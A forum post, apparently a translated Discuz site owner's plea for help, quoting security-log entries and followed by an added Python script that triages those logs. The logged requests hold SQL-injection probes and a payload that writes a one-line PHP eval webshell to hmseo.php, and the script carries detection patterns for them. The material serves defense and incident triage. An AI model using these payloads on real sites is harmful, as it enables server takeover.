A one-line webshell (eval function) was uploaded to my forum-1719
October
<?PHP exit;?> 1572107794 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572108553 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e <b>User:</b> uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
November
<?PHP exit;?> 1572630519 <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 <b>User:</b> uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
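Over the past two days my site has been backdoored twice in a row by the same method. I do use security software, but until this is fixed I can't feel at ease.
Can any expert here tell how the webshell was planted? How do I fix it? If I use the security software's Nginx firewall, how do I add the rule content? Does all of it need to be added to the filter?
That's a lot of questions; thanks again to all the experts.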
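A triage script for the log format posted above, added here as an example and not part of the original post: it parses each entry, converts the timestamp, and flags requests that try to write a PHP file or pass `eval` of request input. The rule names, the regular expressions and the function name `analyse` are assumptions of this example, and the sample entries are shortened copies of two lines from the post.

```python
import re
from datetime import datetime, timezone
from urllib.parse import unquote

# Constructed sample: two entries from the post, with the banner text and the
# PHP call chain shortened to "..."; the Request parts are unchanged.
SAMPLE_LOG = """\
<?PHP exit;?> 1572107794 <b>...</b><br><b>PHP:</b>home.php:0024 -> ... <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 <b>...</b><br><b>PHP:</b>index.php:0132 -> ... <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
"""

# One entry: "<?PHP exit;?> <unix time> ... IP=<ip>; RIP:<ip> Request: <uri>"
ENTRY = re.compile(
    r"^<\?PHP exit;\?>\s+(?P<ts>\d{10})\s.*?IP=(?P<ip>[\d.]+);\s*"
    r"RIP:(?P<rip>[\d.]+)\s+Request:\s*(?P<req>.*)$")

# Assumed triage rules (names and patterns are this example's own).
RULES = [
    ("webshell_write", re.compile(r"file_put_contents\s*\(", re.I)),
    ("eval_of_request_input", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)", re.I)),
    ("php_code_in_parameter", re.compile(r"<\?php|<php>", re.I)),
    ("quote_probe", re.compile(r"=[^&]*['\"](&|$)")),
]
DROPPED = re.compile(r"file_put_contents\s*\(\s*['\"]([^'\"]+)['\"]", re.I)

def analyse(log_text):
    """Return one finding per log entry: time (UTC), IPs, matched rules, file names."""
    findings = []
    for line in log_text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # not a log entry (blank line, month heading, ...)
        req = unquote(m["req"])  # decode %20 etc. before matching
        findings.append({
            "time": datetime.fromtimestamp(int(m["ts"]), tz=timezone.utc).isoformat(),
            "ip": m["ip"],
            "rip": m["rip"],
            "labels": [name for name, rx in RULES if rx.search(req)],
            # File names the request tried to create; check the web root for them.
            "dropped_files": DROPPED.findall(req),
        })
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["time"], f["ip"], f["labels"], f["dropped_files"])
```

A name reported in `dropped_files` (here `hmseo.php`) is the file to look for under the web root.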